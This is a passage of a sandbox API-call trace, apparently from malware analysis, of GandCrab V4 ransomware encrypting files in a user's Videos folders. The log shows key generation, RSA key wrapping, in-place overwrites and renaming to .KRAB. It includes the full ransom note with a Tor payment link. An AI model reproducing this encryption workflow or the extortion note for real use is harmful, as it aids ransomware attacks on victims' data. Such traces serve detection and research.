dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.212] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.212] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xd05f, lpOverlapped=0x0) returned 1 [0099.271] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff2fa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.271] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd05f, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xd05f, lpOverlapped=0x0) returned 1 [0099.271] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.271] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.275] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.276] CloseHandle (hObject=0x434) returned 1 [0099.276] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.276] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\qek8bvn5spgjbjbu.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\qek8bvn5spgjbjbu.avi.krab")) returned 1 [0099.277] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.277] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.277] lstrcmpW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2=".") returned 1 [0099.277] lstrcmpW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="..") returned 1 [0099.277] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="qGC1rwul3tRGFI4JarwF.mp4" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4" [0099.277] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.277] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4.KRAB") returned 58 [0099.278] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4") returned 53 [0099.278] lstrlenW (lpString=".mp4") returned 4 [0099.278] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.278] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp4 ") returned 5 [0099.278] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.278] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4") returned 53 [0099.278] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4") returned 53 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="desktop.ini") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="autorun.inf") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="ntuser.dat") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="iconcache.db") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="bootsect.bak") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="boot.ini") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="ntuser.dat.log") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="thumbs.db") returned -1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="KRAB-DECRYPT.html") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="ntldr") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="NTDETECT.COM") returned 1 [0099.278] lstrcmpiW (lpString1="qGC1rwul3tRGFI4JarwF.mp4", lpString2="Bootfont.bin") returned 1 [0099.279] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.279] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.279] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.280] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.280] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.280] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.280] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.280] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.280] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10113d0) returned 1 [0099.281] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.281] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.281] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.281] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.281] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0099.281] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.282] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0099.308] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.308] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.308] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.308] GetLastError () returned 0x0 [0099.308] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.309] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.309] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0099.309] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0099.309] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.309] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.310] GetLastError () returned 0x0 [0099.310] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.310] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.310] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\qgc1rwul3trgfi4jarwf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.310] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.311] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.311] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xaa35, lpOverlapped=0x0) returned 1 [0099.323] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff55cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.323] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xaa35, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xaa35, lpOverlapped=0x0) returned 1 [0099.323] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.323] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.326] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.327] CloseHandle (hObject=0x434) returned 1 [0099.327] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.327] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\qgc1rwul3trgfi4jarwf.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\qGC1rwul3tRGFI4JarwF.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\qgc1rwul3trgfi4jarwf.mp4.krab")) returned 1 [0099.328] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.328] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.328] lstrcmpW (lpString1="r5vM1f4inO3CYTwdbU", lpString2=".") returned 1 [0099.328] lstrcmpW (lpString1="r5vM1f4inO3CYTwdbU", lpString2="..") returned 1 [0099.328] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="r5vM1f4inO3CYTwdbU" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU" [0099.328] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\" [0099.328] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0099.328] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0099.328] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0099.331] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0099.331] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0099.331] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.332] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.332] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\\\KRAB-DECRYPT.txt") returned 65 [0099.332] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.334] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0099.334] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0099.335] CloseHandle (hObject=0x434) returned 1 [0099.335] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.335] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.335] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2e, wMilliseconds=0x21a)) [0099.335] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.336] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0099.336] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0099.336] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\d2ca4a08d2ca4dee3d.lock") returned 71 [0099.336] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\r5vm1f4ino3cytwdbu\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0099.336] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.337] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.337] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\") returned 48 [0099.337] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\*" [0099.337] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd3e0 [0099.337] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0099.337] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.337] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0099.337] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0099.337] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0099.337] lstrcmpW (lpString1="0GjVnPW0A1Ty.swf", lpString2=".") returned 1 [0099.337] lstrcmpW (lpString1="0GjVnPW0A1Ty.swf", lpString2="..") returned 1 [0099.337] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\", lpString2="0GjVnPW0A1Ty.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf" [0099.337] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.337] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf.KRAB") returned 69 [0099.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf") returned 64 [0099.338] lstrlenW (lpString=".swf") returned 4 [0099.338] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.338] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".swf ") returned 5 [0099.338] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf") returned 64 [0099.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\r5vM1f4inO3CYTwdbU\\0GjVnPW0A1Ty.swf") returned 64 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="desktop.ini") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="autorun.inf") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="ntuser.dat") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="iconcache.db") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="bootsect.bak") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="boot.ini") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="ntuser.dat.log") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="thumbs.db") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="ntldr") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="NTDETECT.COM") returned -1 [0099.338] lstrcmpiW (lpString1="0GjVnPW0A1Ty.swf", lpString2="Bootfont.bin") returned -1 [0099.338] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.339] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011238) returned 1 [0099.339] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.339] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 